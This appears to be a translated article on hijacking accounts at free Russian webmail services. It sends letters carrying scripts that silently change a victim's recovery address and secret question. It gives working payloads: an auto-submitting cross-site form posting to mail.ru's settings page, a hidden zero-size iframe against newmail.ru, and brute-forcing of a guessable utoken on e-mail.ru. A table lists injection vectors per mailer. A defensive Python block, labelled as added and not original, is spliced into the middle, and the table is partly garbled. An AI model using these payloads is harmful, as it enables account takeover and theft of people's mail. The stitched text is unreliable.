However, the GET method cannot change settings in the mail.ru box, therefore I will describe the technical side of the issue in detail.
I. We send a letter to the target mailbox containing code that generates a frame directly in the body of the letter with a link to our website. If possible, the script should be triggered without any user interaction (click, mouse over, image loading, etc.):
II. On the http://yoursite.ru resource we place an HTML document with the form for sending the changed data to the mail.ru server.
<form method="post" action="http://win.mail.ru/cgi-bin/anketa" name="anketa">
<input type="hidden" name="page" value="2">
<input type="hidden" name="Email" value="firstname.lastname@example.org">
<input type="hidden" value="Save" name="Save">
</form>
<script>
document.anketa.submit();
</script>
Notes: the client-side part of the script is guaranteed to work unmodified only in IE; the submission form is placed on a separate site specifically to keep the letter itself small.
Inject the script through the style tag.
Address of the settings page: http://mail01.mail.com/scripts/common/genprofile.cgi
Form Name: profileform
The name of the text field with a secret answer: hint_a
WWW.NEWMAIL.RU
In my opinion, this is quite a popular mailer, so I will cover it in detail. Moreover, getting someone else's account on it is much easier than it seems at first glance. You can do this: send an email with a script that, when launched, obtains the session id, forms the necessary requests, and changes the settings for the alternative email (to which the password will later be sent) and the secret question and answer. However, if you specify any other address when requesting a password reminder, the password will be sent to it, as long as the secret answer is correct. One more observation: the session id is not needed at all to change the settings. Plus, any tags are allowed. All of the above reduces the amount of code to a couple of lines:
<iframe src=http://newmail.ru/users/chpass.dhtml?cp_msg=1&cp_quest=QUESTION&cp_answ=ANSWER width=0 height=0></iframe>
The method for hacking e-mail.ru does not quite fit the general theme of the article, but it is still mail. When I needed to get the password for one mailbox, I registered an account of my own in the usual way and began to investigate the system. The first thing that caught my eye was the ability to set a new password and a secret question with an answer without entering the old password. The usual action plan: check the tag filtering, get the ID and execute the request. However, changing the settings used a special variable, utoken, which is contained in the body of the document. Experimenting with changing the question and answer with a previously known utoken:
I concluded that the ID and cookies are not required to change the settings. At the same time, observing utoken showed that the four-digit hexadecimal number after the email address email@example.com lies in a very narrow range. Namely, to set a secret question and answer on any mailbox of interest, you need to go through all 7 options: 5a00, 5b00, 5c00, 5d00, 5e00, 5f00, 6000. When the number is guessed, we get into the right box.
Notes: there have been some changes since then. The password recovery service does not work, so it makes sense to change it immediately. The address for changing settings has also changed:
The method does not work forever. Probably the user still has to log in to the mailbox via the web interface from time to time.
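Server-side checks that would refuse each request shape described above (the auto-submitted form hosted on another site, the settings change sent as a GET from an iframe, and a token drawn from a handful of guessable values), as an added example that is not part of the original article or any mailer's code. The origin `https://mail.example`, the function names and the sample requests are assumptions constructed for illustration.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)        # per-deployment secret (assumption)
TRUSTED_ORIGIN = "https://mail.example"     # placeholder origin (assumption)

def issue_token(session_id: str) -> str:
    """Return nonce.mac: 128 random bits bound to one session with HMAC-SHA256."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256)
    return f"{nonce}.{mac.hexdigest()}"

def token_valid(session_id: str, token: str) -> bool:
    nonce, _, mac_hex = token.partition(".")
    expected = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256)
    # Constant-time comparison; a guessed or foreign-session token never matches.
    return hmac.compare_digest(expected.hexdigest(), mac_hex)

def authorize_settings_change(method, origin, session_id, token, old_password_ok):
    """Decide whether a request may change the recovery e-mail, question or answer."""
    if method != "POST":
        return False, "state change over GET"      # refuses the iframe-style request
    if origin != TRUSTED_ORIGIN:
        return False, "cross-site origin"          # refuses a form hosted elsewhere
    if not session_id:
        return False, "no authenticated session"   # a token alone must never suffice
    if not token_valid(session_id, token or ""):
        return False, "bad anti-CSRF token"
    if not old_password_ok:
        return False, "current password required"  # re-authenticate before recovery changes
    return True, "ok"

def demo():
    """Constructed requests mirroring the request shapes described in the text."""
    sid = "session-A"                              # constructed session id
    tok = issue_token(sid)
    cases = {
        "get_iframe": ("GET", TRUSTED_ORIGIN, sid, tok, True),
        "cross_site_form": ("POST", "http://yoursite.ru", sid, None, False),
        "guessed_token": ("POST", TRUSTED_ORIGIN, sid, "5a00", True),
        "token_without_session": ("POST", TRUSTED_ORIGIN, "", tok, True),
        "legitimate": ("POST", TRUSTED_ORIGIN, sid, tok, True),
    }
    return {name: authorize_settings_change(*args) for name, args in cases.items()}

if __name__ == "__main__":
    for name, verdict in demo().items():
        print(name, verdict)
```

Each check maps to one weakness: the method check to GET-driven changes, the origin check to the off-site form, the session and HMAC checks to a short guessable token that works without cookies, and the password check to changing recovery data without the old password.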
Table with the characteristics of free WWW-servers
inbox.ru, bk.ru, list.ru,
email.com, post.com, myself.com, consultant.com, etc.
nm.ru, hotmail.ru, orc.ru, nightmail.ru
|Any way||Read / change question and answer. Password is valid|
| www.netman.ru and www.mailgate.ru
same mailer. about 80 domains
|www.yandex.ru||OnError, OnLoad||Deleting the *.narod.ru site (JS is not required)|
|www.ukr.net|| embed src = javasc
ript: this .wav>
|Read the answer to your secret question.|
xaker.ru, email.su, russian.ru, students.ru, programist.ru, designer.ru, mail2k.ru,
pochta.ru, pisem.net, fromru.com, land.ru, and others.
|In many ways||Account deletion|